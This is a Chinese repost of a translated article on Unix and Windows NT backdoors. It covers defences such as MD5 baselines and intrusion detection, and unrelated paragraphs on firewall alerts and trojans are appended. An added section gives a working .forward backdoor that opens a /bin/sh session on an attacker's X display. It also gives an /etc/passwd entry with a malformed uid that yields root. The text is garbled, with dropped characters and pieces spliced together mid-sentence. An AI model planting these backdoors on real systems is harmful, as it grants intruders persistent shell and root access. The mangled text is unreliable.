由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击 因此你将更频繁地看到广泛的来自Unix的网络攻击 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来 今天, Windows NT已经有了tel守护程序 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的 ( With Neork Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT 此处该如何翻译 :(
解决
当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀
评估
首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之许多商业工具用来帮助扫描和查核网络及系统的漏洞 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性
MD5基准线
一个系统(安全)扫描的一个重要因素是MD5校验和基准线 MD5基准线是在黑客入侵前由干净系统建立 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了一些公司被入侵且系统被安置后门长达几个月所有的系统备份多包含了后门 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门 应该在入侵发生前作好基准线的建立
入侵检测
随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要以前多数入侵检测技术是基于日志型的 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话
从CD-ROM启动
一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性这种方法的问题是实现的费用和时间够企业面临的
警告
由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的请记住没有简单的防御,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention 此句该如何翻译 :( )
-------------------------------------------------------------------------
you may want to add:
forward Backdoor
On Unix machines, placing mands into the forward file was also
a mon method of regaining access For the account ``username''
a forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksysotherdom:00 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most monly located at /etc/aliases) Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary mands via
stdin (after minor preprocessing)
PS: The above method is also useful gaining access a panies
mailhub (assuming there is a shared a home directory FS on
&nbs>
the client and server)
> Using rsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves)
你也许要增加:
forward后门
Unix下在forward文件里放入命令是重新获得访问的常用方法 帐户'username'的forward可能设置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksysotherdom:00 -e/bin/sh"
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases) 注意这只是一种简单的变换 更为高级的能够从forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后)>利用 rsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail>类程序, 很有可能还有问题 )
( 此段的内容理解不深, 故付上英文, 请指教! )
---------------------------------------------------------------------------
你也许能用这个"特性"做后门:
当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查出这个错误的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利
例子:
rmartin:x:x50:50:R Martin:/home/rmartin:/bin/tcsh防火墙提示系统被攻击
常见的个人防火墙程序所谓的“攻击”并不一定是真正的网络攻击,很多防火墙程序会将网络广播等最常见的网络访问当作攻击来提示我们并记录下来(局域网内此类的提示尤其多)。另外的“攻击”则可能是有人在扫描你计算机的端口,或者是其他人中了病毒,病毒在利用染毒的计算机扫描网络上的其他电脑。
一般这种情况,只要你定期更新了系统补丁,这些所谓的“攻击”一般是不会造成任何威胁的。
个人认为防火墙程序的这种提示也是一种变相的“广告”而已--你看我多么地有用啊,功能多强大!网络上有这么多的攻击,我都替你拦截了,用我是没有错的!--要真有了攻击,它告诉你没有拦截住,你还会用它吗?我估计你是会马上换防火墙了,对吧?木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。
传染方式:通过电子邮件附件发出,捆绑在其他的程序中。
病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。
木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法 *** 作。
防范措施:用户提高警惕,不下载和运行来历不明的程序,对于不明来历的邮件附件也不要随意打开。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)